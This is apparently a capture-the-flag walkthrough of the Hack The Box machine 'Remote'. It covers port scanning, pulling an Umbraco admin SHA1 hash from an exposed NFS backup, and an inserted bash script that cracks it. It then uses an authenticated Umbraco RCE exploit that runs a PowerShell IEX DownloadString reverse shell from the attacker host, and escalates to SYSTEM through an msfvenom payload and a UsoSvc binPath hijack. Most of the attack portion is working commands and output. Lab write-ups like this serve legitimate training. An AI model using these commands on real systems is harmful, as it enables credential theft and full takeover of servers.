REMOTE WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 13:36 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 13:36
    Completed NSE at 13:36, 0.00s elapsed
    Initiating NSE at 13:36
    Completed NSE at 13:36, 0.00s elapsed
    Initiating NSE at 13:36
    Completed NSE at 13:36, 0.00s elapsed
    Initiating Ping Scan at 13:36
    Scanning 10.10.10.180 [4 ports]
    Completed Ping Scan at 13:36, 0.37s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 13:36
    Completed Parallel DNS resolution of 1 host. at 13:36, 0.18s elapsed
    Initiating SYN Stealth Scan at 13:36
    Scanning 10.10.10.180 [1000 ports]
    Discovered open port 80/tcp on 10.10.10.180
    Discovered open port 111/tcp on 10.10.10.180
    Discovered open port 139/tcp on 10.10.10.180
    Discovered open port 135/tcp on 10.10.10.180
    Discovered open port 445/tcp on 10.10.10.180
    Discovered open port 21/tcp on 10.10.10.180
    Discovered open port 2049/tcp on 10.10.10.180
    Completed SYN Stealth Scan at 13:36, 2.35s elapsed (1000 total ports)
    Initiating Service scan at 13:36
    Scanning 7 services on 10.10.10.180
    Completed Service scan at 13:37, 64.48s elapsed (7 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.180
    Retrying OS detection (try #2) against 10.10.10.180
    Initiating Traceroute at 13:37
    Completed Traceroute at 13:37, 0.43s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 13:37
    Completed Parallel DNS resolution of 2 hosts. at 13:37, 0.20s elapsed
    NSE: Script scanning 10.10.10.180.
    Initiating NSE at 13:37
    NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
    Completed NSE at 13:37, 10.39s elapsed
    Initiating NSE at 13:37
    Completed NSE at 13:38, 69.27s elapsed
    Initiating NSE at 13:38
    Completed NSE at 13:38, 0.00s elapsed
    Nmap scan report for 10.10.10.180
    Host is up (0.29s latency).
    Not shown: 993 closed ports
    PORT     STATE SERVICE       VERSION
    21/tcp   open  ftp           Microsoft ftpd
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | ftp-syst: 
    |_  SYST: Windows_NT
    80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Home - Acme Widgets
    111/tcp  open  rpcbind       2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/tcp6  rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  2,3,4        111/udp6  rpcbind
    |   100003  2,3         2049/udp   nfs
    |   100003  2,3         2049/udp6  nfs
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/tcp6  nfs
    |   100005  1,2,3       2049/tcp   mountd
    |   100005  1,2,3       2049/tcp6  mountd
    |   100005  1,2,3       2049/udp   mountd
    |   100005  1,2,3       2049/udp6  mountd
    |   100021  1,2,3,4     2049/tcp   nlockmgr
    |   100021  1,2,3,4     2049/tcp6  nlockmgr
    |   100021  1,2,3,4     2049/udp   nlockmgr
    |   100021  1,2,3,4     2049/udp6  nlockmgr
    |   100024  1           2049/tcp   status
    |   100024  1           2049/tcp6  status
    |   100024  1           2049/udp   status
    |_  100024  1           2049/udp6  status
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds?
    2049/tcp open  mountd        1-3 (RPC #100005)
    Aggressive OS guesses: Microsoft Windows Vista SP1 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows 10 1703 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 (90%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=257 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 4m56s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-06-22T08:12:25
    |_  start_date: N/A

    TRACEROUTE (using port 80/tcp)
    HOP RTT       ADDRESS
    1   427.21 ms 10.10.14.1
    2   427.21 ms 10.10.10.180

    NSE: Script Post-scanning.
    Initiating NSE at 13:38
    Completed NSE at 13:38, 0.00s elapsed
    Initiating NSE at 13:38
    Completed NSE at 13:38, 0.00s elapsed
    Initiating NSE at 13:38
    Completed NSE at 13:38, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 153.04 seconds
            Raw packets sent: 1282 (57.820KB) | Rcvd: 1205 (49.548KB)

ENUMERATING PORTS

FTP

Nmap reports that anonymous login is allowed (FTP code 230).

WEBSITE

Let's run gobuster against the web server:

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #gobuster dir -u http://10.10.10.180/ -w /usr/share/wordlists/dirb/common.txt 
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.180/
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/06/22 13:56:20 Starting gobuster
    ===============================================================
    /blog (Status: 200)
    /Blog (Status: 200)
    /home (Status: 200)
    /Home (Status: 200)
    /install (Status: 302)
    /intranet (Status: 200)
    /people (Status: 200)
    /People (Status: 200)
    /person (Status: 200)
    /products (Status: 200)
    /Products (Status: 200)
    /umbraco (Status: 200)
    ===============================================================
    2020/06/22 13:59:46 Finished
    ===============================================================

WEBSITE UMBRACO DIRECTORY

This is the Umbraco back-office login page, which needs a username and password.

PORT 111/2049 NFS MOUNT

    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #showmount -e 10.10.10.180
    Export list for 10.10.10.180:
    /site_backups (everyone)
    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #mount -t nfs 10.10.10.180:/site_backups ./mount
    mount.nfs: mount point ./mount does not exist
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #mkdir mount
    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #mount -t nfs 10.10.10.180:/site_backups ./mount
    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #cd mount
    ┌─[root@liquid]─[~/Desktop/HTB/remoteC/mount]
    └──╼ #ls
    App_Browsers  App_Plugins    bin     css           Global.asax  scripts  Umbraco_Client  Web.config
    App_Data      aspnet_client  Config  default.aspx  Media        Umbraco  Views

Umbraco keeps its users (name, login and password hash) in the CMS database file, which in this backup sits under App_Data; the forum thread below explains where to look. Dumping the strings of that file gives the admin record:

https://our.umbraco.com/forum/getting-started/installing-umbraco/35554-Where-does-Umbraco-store-usernames-and-passwords

    adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50

The 40-character hex value in front of {"hashAlgorithm":"SHA1"} is an unsalted SHA1 of the password, so it cracks straight from a wordlist:

    admin@htb.local : baconandcheese
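As an added example (not part of the original writeup), the script below does the two steps above offline: it pulls every hash that sits next to the {"hashAlgorithm":"SHA1"} marker out of a strings dump and brute-forces it with sha1sum. The dump file and the wordlist are constructed inline from the record shown above; the record layout (hash immediately followed by the JSON marker) and the guessed words are assumptions for the demo.

```bash
#!/usr/bin/env bash
# Added example, not part of the original writeup: locate Umbraco user
# records that carry an unsalted SHA1 password hash in a strings dump of the
# site backup, then brute-force the hash against a small wordlist.
set -euo pipefail

WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT

# Constructed sample dump: the single record shown in the writeup, as the raw
# concatenated strings that come out of the Umbraco database file.
SAMPLE_DUMP="$WORKDIR/dump.txt"
printf '%s\n' \
  'adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50' \
  > "$SAMPLE_DUMP"

# Constructed wordlist (assumption: a handful of guesses; a real run would
# point at rockyou.txt or similar).
WORDLIST="$WORKDIR/words.txt"
printf '%s\n' password admin123 cheeseburger baconandcheese widgets > "$WORDLIST"

# extract_sha1_hashes <dump-file>
# Prints every 40-hex-character value that sits directly in front of the
# {"hashAlgorithm":"SHA1"} marker. A bare 40-char hex string tagged SHA1
# means the password was hashed without a salt.
extract_sha1_hashes() {
  grep -aoE '[0-9a-f]{40}\{"hashAlgorithm":"SHA1"\}' "$1" | cut -c1-40 | sort -u
}

# crack_sha1 <hex-hash> <wordlist>
# Hashes each candidate with sha1sum (no salt, no iterations) and prints the
# first match. Returns 1 when nothing in the wordlist matches.
crack_sha1() {
  local target word digest
  target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
  while IFS= read -r word; do
    digest=$(printf '%s' "$word" | sha1sum | cut -d' ' -f1)
    if [ "$digest" = "$target" ]; then
      printf '%s\n' "$word"
      return 0
    fi
  done < "$2"
  return 1
}

# Usage: walk every SHA1 hash found in the dump and try to crack it.
for h in $(extract_sha1_hashes "$SAMPLE_DUMP"); do
  if pw=$(crack_sha1 "$h" "$WORDLIST"); then
    echo "$h : $pw"
  else
    echo "$h : not in wordlist"
  fi
done
```

The same two functions work on a real dump: point extract_sha1_hashes at the output of strings run over the database file from the NFS share, and crack_sha1 at a proper wordlist. Because the hash is unsalted, every user record in the file can be attacked with one pass over the wordlist, which is exactly why a world-readable backup of the CMS database is as good as the credentials themselves.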

GETTING USER ACCESS

Exploit for Umbraco. With valid credentials, the public authenticated remote-code-execution exploit for Umbraco (exploit.py) runs a command on the server; here it launches PowerShell to download and run a reverse-shell script served from the attacker box on port 8000:

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:8000/reverseps.ps1')"

Netcat listener on port 9002:

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #nc -lnvp 9002
    listening on [any] 9002 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49689


    PS C:\windows\temp> whoami 
    iis apppool\defaultapppool
    PS C:\windows\temp> 

Next, get a cmd.exe shell on a second listener (the C:\windows\temp listing later in this writeup shows nc.exe staged there):

    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #nc -lnvp 9003
    listening on [any] 9003 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49754
    Microsoft Windows [Version 10.0.17763.107]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\windows\temp>whoami \priv
    whoami \priv
    ERROR: Invalid argument/option - '\priv'.
    Type "WHOAMI /?" for usage.

    C:\windows\temp>whoami
    whoami
    iis apppool\defaultapppool

    C:\windows\temp>whoami /priv
    whoami /priv

    PRIVILEGES INFORMATION
    ----------------------

    Privilege Name                Description                               State   
    ============================= ========================================= ========
    SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
    SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
    SeAuditPrivilege              Generate security audits                  Disabled
    SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
    SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
    SeCreateGlobalPrivilege       Create global objects                     Enabled 
    SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

    C:\windows\temp>sysinfo 
    sysinfo
    'sysinfo' is not recognized as an internal or external command,
    operable program or batch file.

    C:\windows\temp>systeminfo
    systeminfo

    Host Name:                 REMOTE
    OS Name:                   Microsoft Windows Server 2019 Standard
    OS Version:                10.0.17763 N/A Build 17763
    OS Manufacturer:           Microsoft Corporation
    OS Configuration:          Standalone Server
    OS Build Type:             Multiprocessor Free
    Registered Owner:          Windows User
    Registered Organization:   
    Product ID:                00429-00521-62775-AA801
    Original Install Date:     2/19/2020, 4:03:29 PM
    System Boot Time:          6/22/2020, 2:27:18 AM
    System Manufacturer:       VMware, Inc.
    System Model:              VMware7,1
    System Type:               x64-based PC
    Processor(s):              4 Processor(s) Installed.
                               [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                               [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                               [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                               [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
    BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
    Windows Directory:         C:\Windows
    System Directory:          C:\Windows\system32
    Boot Device:               \Device\HarddiskVolume1
    System Locale:             en-us;English (United States)
    Input Locale:              en-us;English (United States)
    Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
    Total Physical Memory:     4,095 MB
    Available Physical Memory: 2,572 MB
    Virtual Memory: Max Size:  4,799 MB
    Virtual Memory: Available: 3,229 MB
    Virtual Memory: In Use:    1,570 MB
    Page File Location(s):     C:\pagefile.sys
    Domain:                    WORKGROUP
    Logon Server:              N/A
    Hotfix(s):                 5 Hotfix(s) Installed.
                               [01]: KB4534119
                               [02]: KB4462930
                               [03]: KB4516115
                               [04]: KB4523204
                               [05]: KB4464455
    Network Card(s):           1 NIC(s) Installed.
                               [01]: vmxnet3 Ethernet Adapter
                                     Connection Name: Ethernet0 2
                                     DHCP Enabled:    No
                                     IP address(es)
                                     [01]: 10.10.10.180
                                     [02]: fe80::4d8:24d5:55c2:7def
                                     [03]: dead:beef::4d8:24d5:55c2:7def
    Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

    C:\windows\temp>

GETTING ROOT ACCESS

Let's build a reverse-shell exe that a hijacked service will run for us as SYSTEM:

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.12 lport=9004 -f exe > liquid.exe
    [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 324 bytes
    Final size of exe file: 73802 bytes

Serve it from the attacker box on port 8000 as before and download it into C:\windows\temp from the PowerShell shell:

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #nc -lnvp 9002
    listening on [any] 9002 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49689

    PS C:\windows\system32\inetsrv> cd ../../temp
    PS C:\windows\temp>  invoke-webrequest -Uri http://10.10.14.12:8000/liquid.exe -OutFile liquid.exe

The whoami /priv output above shows SeImpersonatePrivilege, but the route used here is a weak service ACL: the IIS app-pool account is allowed to reconfigure UsoSvc (the Update Orchestrator Service), which runs as LocalSystem. Check a service's DACL with sc sdshow or accesschk before picking one, and record its original binPath with sc qc so it can be restored afterwards. Then stop the service, point its binPath at the uploaded exe, and start it: the service control manager launches liquid.exe as SYSTEM and the reverse shell calls back on port 9004. Because the exe never reports a running state the start call times out and the service control manager may reap the process soon after, so plan on spawning a second process from the shell if it turns out to be short-lived.

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #nc -lnvp 9003
    listening on [any] 9003 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49687
    Microsoft Windows [Version 10.0.17763.107]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\windows\temp>dir
    dir
    Volume in drive C has no label.
    Volume Serial Number is BE23-EB3E

    Directory of C:\windows\temp

    06/22/2020  05:06 AM    <DIR>          .
    06/22/2020  05:06 AM    <DIR>          ..
    06/22/2020  03:55 AM    <DIR>          DiagTrack_alternativeTrace
    06/22/2020  03:55 AM    <DIR>          DiagTrack_aot
    06/22/2020  03:55 AM    <DIR>          DiagTrack_diag
    06/22/2020  03:55 AM    <DIR>          DiagTrack_miniTrace
    06/22/2020  05:06 AM            73,802 liquid.exe
    06/22/2020  05:05 AM            91,724 MpCmdRun.log
    02/23/2020  03:20 PM           109,064 MpSigStub.log
    06/22/2020  05:04 AM            45,272 nc.exe
    06/22/2020  04:55 AM               102 silconfig.log
    03/18/2020  04:45 PM    <DIR>          vmware-SYSTEM
    03/18/2020  04:45 PM            27,136 vmware-vmsvc.log
    02/27/2020  10:45 AM            10,823 vmware-vmusr.log
    06/22/2020  04:55 AM               960 vmware-vmvss.log
                8 File(s)        358,883 bytes
                7 Dir(s)  19,409,739,776 bytes free

    C:\windows\temp>sc stop usosvc
    sc stop usosvc

    SERVICE_NAME: usosvc 
            TYPE               : 30  WIN32  
            STATE              : 3  STOP_PENDING 
                                    (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x3
            WAIT_HINT          : 0x7530

    C:\windows\temp>sc config usosvc binpath="c:\windows\temp\liquid.exe"
    sc config usosvc binpath="c:\windows\temp\liquid.exe"
    [SC] ChangeServiceConfig SUCCESS

    C:\windows\temp>sc start usosvc
    sc start usosvc
    [SC] StartService FAILED 1053:

    The service did not respond to the start or control request in a timely fashion.


    C:\windows\temp>

sc start reports error 1053 because liquid.exe is not a real service binary and never checks in with the service control manager, but the process was already launched as LocalSystem, and the listener on 9004 receives the shell:

    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #nc -lnvp 9004
    listening on [any] 9004 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49691
    Microsoft Windows [Version 10.0.17763.107]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami
    whoami
    nt authority\system

    C:\Windows\system32>cd ../../Users/Administrator/Desktop
    cd ../../Users/Administrator/Desktop

    C:\Users\Administrator\Desktop>type root.txt
    type root.txt
    9545907ad***********************

    C:\Users\Administrator\Desktop>cd ../../Public/Desktop
    cd ../../Public/Desktop

    C:\Users\Public\Desktop>dir
    dir
    Volume in drive C has no label.
    Volume Serial Number is BE23-EB3E

    Directory of C:\Users\Public\Desktop

    02/20/2020  03:14 AM             1,191 TeamViewer 7.lnk
                1 File(s)          1,191 bytes
                0 Dir(s)  19,409,514,496 bytes free

    C:\Users\Public\Desktop>cd ..
    cd ..

    C:\Users\Public>dir
    dir
    Volume in drive C has no label.
    Volume Serial Number is BE23-EB3E

    Directory of C:\Users\Public

    02/20/2020  03:42 AM    <DIR>          .
    02/20/2020  03:42 AM    <DIR>          ..
    02/19/2020  04:03 PM    <DIR>          Documents
    09/15/2018  03:19 AM    <DIR>          Downloads
    09/15/2018  03:19 AM    <DIR>          Music
    09/15/2018  03:19 AM    <DIR>          Pictures
    06/22/2020  04:56 AM                34 user.txt
    09/15/2018  03:19 AM    <DIR>          Videos
                1 File(s)             34 bytes
                7 Dir(s)  19,409,514,496 bytes free

    C:\Users\Public>type user.txt
    type user.txt
    0653c**************************

    C:\Users\Public>

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
